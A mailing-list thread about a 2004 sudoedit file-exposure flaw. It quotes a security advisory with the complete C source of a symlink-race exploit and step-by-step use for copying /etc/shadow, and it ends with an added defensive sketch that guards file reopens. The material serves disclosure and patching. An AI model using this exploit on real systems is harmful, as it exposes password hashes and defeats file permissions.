Christoph Probst wrote:
> Hello.
>
> Dominik Elsbroek wrote on 05.10.2004 at 14:53:
>
>
>>I have a more or less serious problem with sudo. With the option
>>-u it is possible for an attacker to use the sudo command to read
>>files to which he should not actually have access.
>
>
> But that is exactly the purpose of sudo. What was this user allowed in
> /etc/sudoers (use visudo to edit it)? If nothing is enabled there
> (i.e. everything has a "#" in front of it), then it may really be
> a bug. Otherwise my first guess is a configuration error.
>
> There is a current security problem in sudo, but it is more
> theoretical: http://www.sudo.ws/sudo/alerts/sudoedit.html
>
> Otherwise I cannot find anything suspicious in the changelog from
> version 1.6.7p5 onwards. But you are right: it would be about time for
> an update to 1.6.8p1.
>
>
> Chris
>

Hm... well, if it had been a config error I would not have
said: there is a bug... two, even

I received the following message by mail:

The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com

Sudo -u Parameter File Exposure
------------------------------------------------------------------------


SUMMARY

<http://www.sudo.ws/sudo/sudo.html> Sudo (superuser do) allows a system
administrator to give certain users (or groups of users) the ability to
run some (or all) commands as root or another user while logging the
commands and arguments.

A flaw exists in sudo's -u option (aka sudoedit) that can give an
attacker read permission to a file that would otherwise be unreadable.

DETAILS

Vulnerable Systems:
 * sudo 1.6.8 and prior

Immune Systems:
 * sudo version 1.6.8p1 and newer

While sudoedit runs the actual editor as the invoking user, the temporary
file is then re-opened with root privileges. An attacker can run sudoedit,
remove the editor temporary file, make a link to an unreadable file with
the same name as the old temporary file and quit the editor. The file
being edited via sudoedit will now contain a copy of the previously
unreadable file.

Impact:
Exploitation of the bug requires that the sudoers file be configured to
allow the attacker to run sudoedit. If no users have been granted access
to sudoedit there is no impact.

Fix:
The bug is fixed in sudo 1.6.8p1.

Exploit:
/*

Copyright Rosiello Security 2004
http://www.rosiello.org

sudoedit Exploit


SOFTWARE : sudoedit
REFERENCE: http://www.sudo.ws/sudo/alerts/sudoedit.html
DATE: 18/09/2004

Summary:
A flaw exists in sudo's -u option (aka sudoedit)
in sudo version 1.6.8 that can give an attacker
read permission to a file that would otherwise be
unreadable.

Sudo versions affected:
1.6.8 only

Credit:
Reznic Valery discovered the problem.

-----------------------------------------------------------

All the information that you can find in this software
were published for educational and didactic purpose only.
The author published this program under the condition
that is not in the intention of the reader to use them
in order to bring to himself or others a profit or to bring
to others damage.

!Respect the law!

How do I use this code ?

To exploit sudoedit you have to open with it the
file "rosiello" as shown in the example.

EXAMPLE SCENARIO:

1) Open two shells (i) and (ii);
2) (i)$sudoedit rosiello;
3) (ii)$./sudoedit-exploit /etc/shadow;
4) (i) close sudoedit.

The file "rosiello" is now a copy of "/etc/shadow".

AUTHOR : Angelo Rosiello
CONTACT: angelo@××××××××.org

*/

#include <stdio.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <dirent.h>


int main( int argc, char *argv[] )
{
    char PATH[]="/usr/tmp";
    char file[32];
    DIR *tmp;
    struct dirent *de;
    int found = 0;

    printf( "Copyright Rosiello Security 2004\n" );
    printf( "http://www.rosiello.org\n" );

    if( argc!=2 )
    {
        printf( "USAGE: %s file\n", argv[0] );
        return( -1 );
    }


    tmp = opendir ( PATH );
    while ( !found && (de = readdir ( tmp ))!= NULL )
    {
        if ( (strstr(de->d_name, "rosiello") != NULL) )
        {
            if( strlen(de->d_name) > 22 ) return( -1 );
            sprintf( file, "%s/%s", PATH, (char *)de->d_name );
            remove( file );
            if( fork()!=0 )
            {
                execl( "/bin/ln", "ln", "-s", argv[1], file, NULL );
            }
            wait( );
            printf( "Now you can close sudoedit and reopen rosiello!\n" );
            found=1;

        }

    }
    closedir( tmp );

    if( !found )
        printf( "File Not Found!\n" );
    return( 0 );

}

Regards, Dominik

--
gentoo-user-de@g.o mailing list
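
The advisory quoted in the mail above describes a privileged process re-opening a temporary file by name after an unprivileged user had the chance to replace it. As an added example (not part of the original mail, and not sudo's actual fix), this C sketch shows one way to guard such a reopen: refuse symlinks and verify that the opened file is still the one that was created. `reopen_same_file` and `demo_reopen` are hypothetical names, and the temp files are constructed for the self-check.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L            /* O_NOFOLLOW, mkstemp, symlink */
#endif
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Re-open path and return an fd only if it is still the file recorded in
 * *orig (fstat() taken at creation). Hypothetical helper, not sudo code. */
int reopen_same_file(const char *path, const struct stat *orig)
{
    struct stat now;
    /* O_NOFOLLOW: fail if the final path component is a symlink.
     * O_NONBLOCK: do not hang if the name now refers to a FIFO. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;
    if (fstat(fd, &now) != 0 || !S_ISREG(now.st_mode) || now.st_nlink != 1 ||
        now.st_dev != orig->st_dev || now.st_ino != orig->st_ino) {
        close(fd);                          /* replaced, or extra hard link */
        return -1;
    }
    return fd;
}

/* Constructed self-check on private temp files. swap: 0 = leave the temp file
 * alone, 1 = replace it with a symlink, 2 = replace it with a hard link to a
 * second file. Returns 1 if the reopen is accepted, 0 if rejected, -1 on error. */
int demo_reopen(int swap)
{
    char tmp[] = "/tmp/reopen-demo-XXXXXX", other[] = "/tmp/reopen-other-XXXXXX";
    struct stat orig;
    int keep = mkstemp(tmp);                /* kept open: inode cannot be reused */
    int ofd = mkstemp(other);               /* stands in for the protected file */
    if (keep < 0 || ofd < 0 || fstat(keep, &orig) != 0)
        return -1;
    int rc = 0;
    if (swap != 0) {
        unlink(tmp);
        rc = (swap == 1) ? symlink(other, tmp) : link(other, tmp);
    }
    int fd = (rc == 0) ? reopen_same_file(tmp, &orig) : -1;
    unlink(tmp);
    unlink(other);
    close(keep);
    close(ofd);
    if (fd >= 0) close(fd);
    return rc != 0 ? -1 : (fd >= 0);
}
```

An editor that saves by writing a new file and renaming it over the old one changes the inode and would be rejected by this check, so a tool in this position can instead perform the open with the invoking user's credentials and let the kernel enforce read permission.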